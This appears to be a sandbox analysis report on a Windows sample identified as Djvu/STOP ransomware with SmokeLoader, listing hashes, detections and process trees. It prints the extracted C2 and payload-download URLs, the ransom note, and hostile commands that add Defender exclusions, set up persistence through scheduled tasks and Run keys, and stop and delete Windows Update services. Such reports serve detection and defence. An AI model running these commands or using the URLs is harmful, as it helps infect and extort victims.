Analysis
-
max time kernel
27s -
max time network
132s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
24-02-2023 13:54
Static task
static1
Behavioral task
behavioral1
Sample
a5544fe3b20b68f0e9f922a619106f958cd540bbd04d693f88da41ef52e4163e.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
a5544fe3b20b68f0e9f922a619106f958cd540bbd04d693f88da41ef52e4163e.exe
Resource
win10v2004-20230220-en
General
-
Target
a5544fe3b20b68f0e9f922a619106f958cd540bbd04d693f88da41ef52e4163e.exe
-
Size
218KB
-
MD5
787552a670f1d84519eac15b3bff157d
-
SHA1
625517d47b2f4f7aeff5143bffc07fd48460c150
-
SHA256
a5544fe3b20b68f0e9f922a619106f958cd540bbd04d693f88da41ef52e4163e
-
SHA512
ecc4d91791ad983298d58d3be2f8b3afc350e2ed2e05899f1b18eae9f6cb8756b4aba3b046ade49b57a43e2f553ede10b2f104716b40ab579a348bd03a2091ac
-
SSDEEP
3072:lFJon5L1iJZmUBGIYQS915j1Y7EnzRB1TrxF65jm3L1gHTy:xaLomUBVS9XhY7EnzRzrxGjmb1t
Malware Config
Extracted
djvu
http://jiqaz.com/lancer/get.php
http://jiqaz.com/test2/get.php
-
extension
.iotr
-
offline_id
O5Ml6uMfuo0gYusk48e0q49EQlFERyL5eSVQmVt1
-
payload_url
http://uaery.top/dl/build2.exe
http://jiqaz.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-vdhH9Qcpjj Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0651JOsie
Signatures
-
Detected Djvu ransomware 24 IoCs
Processes:
resource yara_rule behavioral2/memory/3528-169-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/1664-172-0x0000000002350000-0x000000000246B000-memory.dmp family_djvu behavioral2/memory/3528-171-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/3528-173-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/3528-187-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/3528-208-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4136-228-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4136-268-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4136-226-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4136-284-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4136-287-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4136-329-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/2712-338-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/2720-339-0x0000000002350000-0x000000000246B000-memory.dmp family_djvu behavioral2/memory/2712-340-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/2712-336-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4136-333-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4136-326-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/2712-349-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4136-350-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/2712-355-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4856-368-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4856-376-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4856-525-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Detects Smokeloader packer 3 IoCs
Processes:
resource yara_rule behavioral2/memory/1180-134-0x00000000008C0000-0x00000000008C9000-memory.dmp family_smokeloader behavioral2/memory/2340-188-0x00000000005E0000-0x00000000005E9000-memory.dmp family_smokeloader behavioral2/memory/2804-269-0x00000000006A0000-0x00000000006A9000-memory.dmp family_smokeloader -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2696 4448 rundll32.exe -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Executes dropped EXE 6 IoCs
Processes:
CBE0.exeCD97.exeCD97.exeD086.exeD1A0.exeDF2E.exepid process 1408 CBE0.exe 1664 CD97.exe 3528 CD97.exe 2340 D086.exe 1780 D1A0.exe 1412 DF2E.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\CBD.exe themida C:\Users\Admin\AppData\Local\Temp\CBD.exe themida behavioral2/memory/3872-342-0x0000000000B50000-0x00000000011DE000-memory.dmp themida behavioral2/memory/3872-379-0x0000000000B50000-0x00000000011DE000-memory.dmp themida -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\llpb1133a.exe vmprotect C:\Users\Admin\AppData\Local\Temp\llpb1133a.exe vmprotect behavioral2/memory/4540-243-0x0000000140000000-0x000000014061E000-memory.dmp vmprotect C:\Users\Admin\AppData\Local\Temp\llpb1133a.exe vmprotect C:\Users\Admin\AppData\Local\Temp\llpb1133a.exe vmprotect behavioral2/memory/4404-274-0x0000000140000000-0x000000014061E000-memory.dmp vmprotect -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
CD97.exeCBE0.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\3215333e-0b66-4852-8a39-1bf3063bc010\\CD97.exe\" --AutoStart" CD97.exe Set value (str) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\telemetry = "C:\\Users\\Admin\\AppData\\Roaming\\telemetry\\svcservice.exe" CBE0.exe -
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 32 api.2ip.ua 59 api.2ip.ua 71 api.2ip.ua 19 api.2ip.ua 20 api.2ip.ua -
Suspicious use of SetThreadContext 1 IoCs
Processes:
CD97.exedescription pid process target process PID 1664 set thread context of 3528 1664 CD97.exe CD97.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 3156 sc.exe 3224 sc.exe 1968 sc.exe 1008 sc.exe 4748 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 6 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3912 1780 WerFault.exe D1A0.exe 4260 4556 WerFault.exe EA1B.exe 2676 3860 WerFault.exe F142.exe 5012 2508 WerFault.exe rundll32.exe 3200 1408 WerFault.exe CBE0.exe 1648 376 WerFault.exe build2.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
a5544fe3b20b68f0e9f922a619106f958cd540bbd04d693f88da41ef52e4163e.exeD086.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a5544fe3b20b68f0e9f922a619106f958cd540bbd04d693f88da41ef52e4163e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D086.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D086.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D086.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a5544fe3b20b68f0e9f922a619106f958cd540bbd04d693f88da41ef52e4163e.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a5544fe3b20b68f0e9f922a619106f958cd540bbd04d693f88da41ef52e4163e.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
a5544fe3b20b68f0e9f922a619106f958cd540bbd04d693f88da41ef52e4163e.exepid process 1180 a5544fe3b20b68f0e9f922a619106f958cd540bbd04d693f88da41ef52e4163e.exe 1180 a5544fe3b20b68f0e9f922a619106f958cd540bbd04d693f88da41ef52e4163e.exe 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 3128 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
a5544fe3b20b68f0e9f922a619106f958cd540bbd04d693f88da41ef52e4163e.exepid process 1180 a5544fe3b20b68f0e9f922a619106f958cd540bbd04d693f88da41ef52e4163e.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
description pid process Token: SeShutdownPrivilege 3128 Token: SeCreatePagefilePrivilege 3128 Token: SeShutdownPrivilege 3128 Token: SeCreatePagefilePrivilege 3128 Token: SeShutdownPrivilege 3128 Token: SeCreatePagefilePrivilege 3128 Token: SeShutdownPrivilege 3128 Token: SeCreatePagefilePrivilege 3128 -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
CD97.exeCD97.exedescription pid process target process PID 3128 wrote to memory of 1408 3128 CBE0.exe PID 3128 wrote to memory of 1408 3128 CBE0.exe PID 3128 wrote to memory of 1408 3128 CBE0.exe PID 3128 wrote to memory of 1664 3128 CD97.exe PID 3128 wrote to memory of 1664 3128 CD97.exe PID 3128 wrote to memory of 1664 3128 CD97.exe PID 1664 wrote to memory of 3528 1664 CD97.exe CD97.exe PID 1664 wrote to memory of 3528 1664 CD97.exe CD97.exe PID 1664 wrote to memory of 3528 1664 CD97.exe CD97.exe PID 1664 wrote to memory of 3528 1664 CD97.exe CD97.exe PID 1664 wrote to memory of 3528 1664 CD97.exe CD97.exe PID 1664 wrote to memory of 3528 1664 CD97.exe CD97.exe PID 1664 wrote to memory of 3528 1664 CD97.exe CD97.exe PID 1664 wrote to memory of 3528 1664 CD97.exe CD97.exe PID 1664 wrote to memory of 3528 1664 CD97.exe CD97.exe PID 1664 wrote to memory of 3528 1664 CD97.exe CD97.exe PID 3128 wrote to memory of 2340 3128 D086.exe PID 3128 wrote to memory of 2340 3128 D086.exe PID 3128 wrote to memory of 2340 3128 D086.exe PID 3128 wrote to memory of 1780 3128 D1A0.exe PID 3128 wrote to memory of 1780 3128 D1A0.exe PID 3128 wrote to memory of 1780 3128 D1A0.exe PID 3528 wrote to memory of 2508 3528 CD97.exe icacls.exe PID 3528 wrote to memory of 2508 3528 CD97.exe icacls.exe PID 3528 wrote to memory of 2508 3528 CD97.exe icacls.exe PID 3128 wrote to memory of 1412 3128 DF2E.exe PID 3128 wrote to memory of 1412 3128 DF2E.exe PID 3128 wrote to memory of 1412 3128 DF2E.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\a5544fe3b20b68f0e9f922a619106f958cd540bbd04d693f88da41ef52e4163e.exe"C:\Users\Admin\AppData\Local\Temp\a5544fe3b20b68f0e9f922a619106f958cd540bbd04d693f88da41ef52e4163e.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1180
-
C:\Users\Admin\AppData\Local\Temp\CBE0.exeC:\Users\Admin\AppData\Local\Temp\CBE0.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1408 -
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"2⤵PID:4348
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 11482⤵
- Program crash
PID:3200
-
C:\Users\Admin\AppData\Local\Temp\CD97.exeC:\Users\Admin\AppData\Local\Temp\CD97.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Users\Admin\AppData\Local\Temp\CD97.exeC:\Users\Admin\AppData\Local\Temp\CD97.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3528 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\3215333e-0b66-4852-8a39-1bf3063bc010" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:2508 -
C:\Users\Admin\AppData\Local\Temp\CD97.exe"C:\Users\Admin\AppData\Local\Temp\CD97.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:5080
-
C:\Users\Admin\AppData\Local\Temp\CD97.exe"C:\Users\Admin\AppData\Local\Temp\CD97.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:4136
-
C:\Users\Admin\AppData\Local\2caa3e9b-9944-4291-bf4d-6bb06397d4e5\build2.exe"C:\Users\Admin\AppData\Local\2caa3e9b-9944-4291-bf4d-6bb06397d4e5\build2.exe"5⤵PID:4144
-
C:\Users\Admin\AppData\Local\2caa3e9b-9944-4291-bf4d-6bb06397d4e5\build2.exe"C:\Users\Admin\AppData\Local\2caa3e9b-9944-4291-bf4d-6bb06397d4e5\build2.exe"6⤵PID:376
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 376 -s 18287⤵
- Program crash
PID:1648
-
C:\Users\Admin\AppData\Local\Temp\D086.exeC:\Users\Admin\AppData\Local\Temp\D086.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:2340
-
C:\Users\Admin\AppData\Local\Temp\D1A0.exeC:\Users\Admin\AppData\Local\Temp\D1A0.exe1⤵
- Executes dropped EXE
PID:1780 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 3402⤵
- Program crash
PID:3912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 1780 -ip 17801⤵PID:5008
-
C:\Users\Admin\AppData\Local\Temp\DF2E.exeC:\Users\Admin\AppData\Local\Temp\DF2E.exe1⤵
- Executes dropped EXE
PID:1412 -
C:\Users\Admin\AppData\Local\Temp\llpb1133a.exe"C:\Users\Admin\AppData\Local\Temp\llpb1133a.exe"2⤵PID:4540
-
C:\Users\Admin\AppData\Local\Temp\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"2⤵PID:4056
-
C:\Users\Admin\AppData\Local\Temp\liyy.exe"C:\Users\Admin\AppData\Local\Temp\liyy.exe"2⤵PID:3032
-
C:\Users\Admin\AppData\Local\Temp\liyy.exe"C:\Users\Admin\AppData\Local\Temp\liyy.exe" -h3⤵PID:3672
-
C:\Users\Admin\AppData\Local\Temp\EA1B.exeC:\Users\Admin\AppData\Local\Temp\EA1B.exe1⤵PID:4556
-
C:\Users\Admin\AppData\Local\Temp\llpb1133a.exe"C:\Users\Admin\AppData\Local\Temp\llpb1133a.exe"2⤵PID:4404
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 15562⤵
- Program crash
PID:4260
-
C:\Users\Admin\AppData\Local\Temp\EEB0.exeC:\Users\Admin\AppData\Local\Temp\EEB0.exe1⤵PID:2804
-
C:\Users\Admin\AppData\Local\Temp\F142.exeC:\Users\Admin\AppData\Local\Temp\F142.exe1⤵PID:3860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 3402⤵
- Program crash
PID:2676
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3860 -ip 38601⤵PID:1092
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4556 -ip 45561⤵PID:2064
-
C:\Users\Admin\AppData\Local\Temp\F6FF.exeC:\Users\Admin\AppData\Local\Temp\F6FF.exe1⤵PID:1916
-
C:\Users\Admin\AppData\Local\Temp\FA1D.exeC:\Users\Admin\AppData\Local\Temp\FA1D.exe1⤵PID:2228
-
C:\Users\Admin\AppData\Local\Temp\5B7.exeC:\Users\Admin\AppData\Local\Temp\5B7.exe1⤵PID:2720
-
C:\Users\Admin\AppData\Local\Temp\5B7.exeC:\Users\Admin\AppData\Local\Temp\5B7.exe2⤵PID:2712
-
C:\Users\Admin\AppData\Local\Temp\5B7.exe"C:\Users\Admin\AppData\Local\Temp\5B7.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:2340
-
C:\Users\Admin\AppData\Local\Temp\5B7.exe"C:\Users\Admin\AppData\Local\Temp\5B7.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:4856
-
C:\Users\Admin\AppData\Local\9036c368-d8cd-49b9-9c44-763926fe6f2f\build2.exe"C:\Users\Admin\AppData\Local\9036c368-d8cd-49b9-9c44-763926fe6f2f\build2.exe"5⤵PID:888
-
C:\Users\Admin\AppData\Local\9036c368-d8cd-49b9-9c44-763926fe6f2f\build2.exe"C:\Users\Admin\AppData\Local\9036c368-d8cd-49b9-9c44-763926fe6f2f\build2.exe"6⤵PID:1344
-
C:\Users\Admin\AppData\Local\Temp\CBD.exeC:\Users\Admin\AppData\Local\Temp\CBD.exe1⤵PID:3872
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"2⤵PID:4800
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe"2⤵PID:4476
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"2⤵PID:2852
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe"2⤵PID:4396
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe"2⤵PID:1972
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe" & exit3⤵PID:4160
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe"2⤵PID:744
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe"2⤵PID:4596
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
PID:2696 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open2⤵PID:2508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2508 -s 6003⤵
- Program crash
PID:5012
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2508 -ip 25081⤵PID:4592
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1408 -ip 14081⤵PID:1000
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 376 -ip 3761⤵PID:2504
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force1⤵PID:4356
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }1⤵PID:4256
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 01⤵PID:924
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 02⤵PID:4908
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 02⤵PID:2868
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 02⤵PID:2196
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 02⤵PID:528
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f1⤵PID:2412
-
C:\Windows\System32\sc.exesc stop UsoSvc2⤵
- Launches sc.exe
PID:4748 -
C:\Windows\System32\sc.exesc stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:3156 -
C:\Windows\System32\sc.exesc stop wuauserv2⤵
- Launches sc.exe
PID:3224 -
C:\Windows\System32\sc.exesc stop bits2⤵
- Launches sc.exe
PID:1968 -
C:\Windows\System32\sc.exesc stop dosvc2⤵
- Launches sc.exe
PID:1008 -
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f2⤵PID:4600
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f2⤵PID:2612
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f2⤵PID:1200
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f2⤵PID:3428
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:4624
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
112KB
MD5780853cddeaee8de70f28a4b255a600b
SHA1ad7a5da33f7ad12946153c497e990720b09005ed
SHA2561055ff62de3dea7645c732583242adf4164bdcfb9dd37d9b35bbb9510d59b0a3
SHA512e422863112084bb8d11c682482e780cd63c2f20c8e3a93ed3b9efd1b04d53eb5d3c8081851ca89b74d66f3d9ab48eb5f6c74550484f46e7c6e460a8250c9b1d8
-
Filesize
92KB
MD5ec9dc2b3a8b24bcbda00502af0fedd51
SHA1b555e8192e4aef3f0beb5f5381a7ad7095442e8d
SHA2567378950f042c94b08cc138fd8c02e41f88b616cd17f23c0c06d4e3ca3e2937d2
SHA5129040813d94956771ce06cdc1f524e0174c481cdc0e1d93cbf8a7d76dd321a641229e5a9dd1c085e92a9f66d92b6d7edc80b77cd54bb8905852c150234a190194
-
Filesize
148KB
MD590a1d4b55edf36fa8b4cc6974ed7d4c4
SHA1aba1b8d0e05421e7df5982899f626211c3c4b5c1
SHA2567cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c
SHA512ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2
-
Filesize
124KB
MD59618e15b04a4ddb39ed6c496575f6f95
SHA11c28f8750e5555776b3c80b187c5d15a443a7412
SHA256a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
42B
MD515a69b8e478da0a3c34463ce2a3c9727
SHA19ee632cb0e17b760f5655d67f21ad9dd9c124793
SHA25600dc9381b42367952477eceac3373f4808fce89ee8ef08f89eb62fb68bafce46
SHA512e6c87e615a7044cb7c9a4fac6f1db28520c4647c46a27bf8e30dcd10742f7d4f3360ead47cd67f531de976c71b91ecb45cf0ac5d1d472fa00b8eed643514feff
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
Filesize2KB
MD5cbaaa31a46cfb789bbc98a8096e56da3
SHA179f471052d4383203500bbef818957b5b8dea21d
SHA25613493838900a0f05699a35456ea36ced2321158008d48981916e240cbdb61afd
SHA512fc5508284fb2f5879ae09d4af5861f1698f1f2f10f9dcff728d0a56d62a60459543eaf51476deeb8e9225a2cc80271d5408544e84d5bec94ca0640cf832aadc6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771
Filesize1KB
MD5a736313c3bc3b657a0a06f91b7b324b3
SHA199dbb2e25d246c2b60caa35cb92526bd7d88b22a
SHA2563b5fc29f22962dd24a85720c837bbe6626fde2f59b508fe246ddb344421abc70
SHA512d3c33b79b4439d0137fa2117525ce0c82502adbd728ff9f346b15dfec15109a481fbefa4b7a698356733865aa0ae980ef9bdf099034afd599e3678f0895aede5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\70C71DBB8B7D2BBCA12DF82826D851E0_278EAB15C57802B8465F5CA2986E9B30
Filesize1KB
MD5c4d985211b2f7895bd251555145e28f1
SHA1d62c6092987466ae545a40c748552f723dcc1d88
SHA2561265faef33a2a743dc71c26e782182eb97fac1c7405ae7f733076253356da61c
SHA5129e3d16f027ae9dfe915ed368692a5a4591c48f762d0ebafe54a7013ddbc7b339f0ad521c40c4c5406b89f5a60c032c39cb79fa9dceef960ff032356be8a90e60
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
Filesize1KB
